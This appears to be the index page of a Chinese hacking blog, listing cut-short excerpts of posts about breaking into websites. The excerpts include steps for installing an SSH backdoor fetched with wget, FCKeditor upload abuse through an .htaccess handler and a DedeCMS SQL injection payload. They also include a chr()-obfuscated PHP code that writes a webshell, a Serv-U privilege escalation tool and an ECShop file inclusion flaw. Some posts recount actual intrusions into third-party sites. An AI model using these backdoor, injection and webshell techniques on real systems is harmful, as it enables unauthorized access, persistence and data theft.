WebShell'S Blog

话说今早不知道怎么逛到https://www.webshell.cc/1.txt那里去了PS：后来想起是村长大牛提交的黑页 看见别人挂这个多好看啊，于是小菜也是想起了来检测一番的念头，既然有了想法就开始干活吧，主站打不开了，估计是给弄坏了，于是想起旁注了，看看是不是独立的站点，打开土司的旁注查询，把域名放进去看看，幸亏不是独立的站点 哇！！这个站还真不少..72个，其实还是有好多没法打开.. 开始一...

- 阅读全文 -

ssh后门的设置与登入　　 1、mv /etc/ssh/ssh_config /etc/ssh/ssh_config.old 2、mv /etc/ssh/sshd_config /etc/ssh/sshd_config.old 3、下载并安装ssh后门: shell-# wgethttp://192.168.1.188/sshbd.tgz shell-# tar zxvf sshbd.tgz sh...

- 阅读全文 -

真是杯具了 啊 …… 看来 哪里都有不怕死的 ……   地址已经失效！

- 阅读全文 -

利用步骤: 1.创建一个htaccess文件: 代码内容: SetHandler application/x-httpd-php 2.实用编辑器上传htaccess文件. https://www.webshell.cc/FCKeditor/editor/filemanager/upload/test.html https://www.webshell.cc/FCKeditor/editor/filem...

- 阅读全文 -

有时候用aspxshell的iisspy功能看不到网站路径跟域名，可以尝试下下面这个方法 1.查询IIS里的所有网站 C:WINDOWSsystem32>cscript.exe iisweb.vbs /query Microsoft (R) Windows Script Host Version 5.6 版权所有(C) Microsoft Corporation 1996-2001。保留所有...

- 阅读全文 -

今晚在搞https://www.webshell.cc/的时候拿下旁站权限，但不能夸到目标站的目录下，眼看目标就在眼前却被最后一道关卡给卡死了。之前也有尝试过pr提权，单asp一执行pr就卡死了。。 无奈之下找了群里龙儿心一起来研究，龙儿心经验不错，到shell上立马就搞定了目标站的路径，获取IIS网站路劲和其他基本信息也是使用一个VBS脚本搞定的，这个在我blog中有一个文章帖出来代码。这里我将就...

- 阅读全文 -

HWay && Serv-U.php 利用Serv-U的本地权限提升漏洞自动安装Hway!即使服务器的Serv-U密码被更改,只要ServUAdmin.exe可读,它便能读出更改后的密码.此外HWay && Serv-U.php还具有本地端口扫描的功能. 如果服务器的Serv-U的端口,密码都没有更改,那么直接点击”安装Hway”便可安装成功.否则请点击"获取Ser...

- 阅读全文 -

搜索关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%...

- 阅读全文 -

简要描述: 后台可以提交构造代码绕过过滤,成功解析生成一句话木马 防黑网。 详细说明： <?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112); $filec=chr(60).chr(63).chr(112).chr(104).chr...

- 阅读全文 -

直接看代码： js/calendar.php $lang = (!empty($_GET['lang'])) ? trim($_GET['lang']) : ‘zh_cn’;//没有过滤，很明显的包含漏洞 if (!file_exists(‘../languages/’ . $lang . ‘/calendar.php’)) { $lang = ‘zh_cn’; } require(dirname...

- 阅读全文 -